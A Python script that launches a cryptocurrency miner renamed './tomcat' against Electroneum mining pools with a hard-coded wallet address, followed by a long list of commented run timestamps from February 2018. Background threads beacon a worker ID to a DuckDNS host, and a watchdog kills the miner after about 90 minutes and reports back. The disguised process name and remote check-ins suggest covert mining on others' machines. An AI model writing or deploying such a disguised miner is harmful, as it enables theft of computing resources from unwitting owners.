import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:16:03.976179
#2018-02-17 17:05:07.817359
#2018-02-17 18:53:05.176485
#2018-02-17 20:42:05.318515
#2018-02-17 22:29:01.420217
#2018-02-18 00:12:06.324760
#2018-02-18 02:04:04.163754
#2018-02-18 03:50:07.007136
#2018-02-18 05:38:03.960119
#2018-02-18 07:31:05.044729
#2018-02-18 09:19:05.878622
#2018-02-18 11:05:07.210296
#2018-02-18 12:52:06.526184
#2018-02-18 14:38:05.666697
#2018-02-18 16:27:04.874932
#2018-02-18 18:16:03.968741
#2018-02-18 20:03:07.495409
#2018-02-18 21:51:05.165459
#2018-02-18 23:40:01.377523
#2018-02-19 01:26:07.260022
#2018-02-19 03:15:04.446628
#2018-02-19 05:00:09.530320
#2018-02-19 06:46:06.169282
#2018-02-19 08:35:07.833749
#2018-02-19 10:24:07.626966
#2018-02-19 12:12:08.273211
#2018-02-19 14:01:06.107618
#2018-02-19 15:50:09.814644
#2018-02-19 17:39:09.852383
#2018-02-19 19:27:04.306945
#2018-02-19 21:13:06.576093
#2018-02-19 23:01:01.992990
#2018-02-20 00:44:01.280756
#2018-02-20 02:35:07.744791
#2018-02-20 04:23:06.813215
#2018-02-20 06:07:08.071682
#2018-02-20 07:52:04.477226
#2018-02-20 09:38:06.195489
#2018-02-20 11:22:02.189284
#2018-02-20 13:09:01.979501
#2018-02-20 14:52:05.883609
#2018-02-20 16:36:07.873976
#2018-02-20 18:23:07.746267
#2018-02-20 20:14:07.838264
#2018-02-20 22:00:09.541184
#2018-02-20 23:40:08.178833
#2018-02-21 01:24:05.493288
#2018-02-21 03:13:06.675370
#2018-02-21 05:01:07.955766
#2018-02-21 06:49:07.031842
#2018-02-21 08:36:07.622592
#2018-02-21 10:22:03.860580
#2018-02-21 12:09:06.182778
#2018-02-21 13:58:08.867999
#2018-02-21 15:44:10.308124
#2018-02-21 17:37:06.868322
#2018-02-21 19:22:01.903156
#2018-02-21 21:09:01.997195
#2018-02-21 22:55:08.394334
#2018-02-22 00:43:05.200039
#2018-02-22 02:32:04.040620
#2018-02-22 04:18:01.614912
#2018-02-22 06:03:01.728664
#2018-02-22 07:48:07.668437
#2018-02-22 09:36:08.870420
#2018-02-22 11:21:06.250821
#2018-02-22 13:07:08.458961
#2018-02-22 14:54:07.648646
#2018-02-22 16:39:06.955754
#2018-02-22 18:25:11.300809
#2018-02-22 20:18:08.247120
#2018-02-22 22:05:09.813507
#2018-02-22 23:52:09.107010
#2018-02-23 01:39:07.866620
#2018-02-23 03:26:05.774784
#2018-02-23 05:13:01.967669
#2018-02-23 06:57:06.981535
#2018-02-23 08:48:01.478053
#2018-02-23 11:06:06.010553
#2018-02-23 13:00:01.796214
#2018-02-23 14:44:09.725333
#2018-02-23 16:32:10.107895
#2018-02-23 18:20:01.478553
#2018-02-23 20:04:01.650126
#2018-02-23 21:47:05.233905
#2018-02-23 23:41:07.111571
#2018-02-24 01:29:03.474175
#2018-02-24 03:18:05.436587
#2018-02-24 05:03:07.195592
#2018-02-24 06:51:05.221883
#2018-02-24 08:40:07.589274
#2018-02-24 10:24:05.346505
#2018-02-24 12:19:05.122017
#2018-02-24 14:10:06.617281
#2018-02-24 15:57:05.514917
#2018-02-24 17:49:06.371233
#2018-02-24 19:37:07.062863
#2018-02-24 21:24:04.684923
#2018-02-25 00:04:06.848311
#2018-02-25 03:18:05.778868
#2018-02-25 06:57:06.715736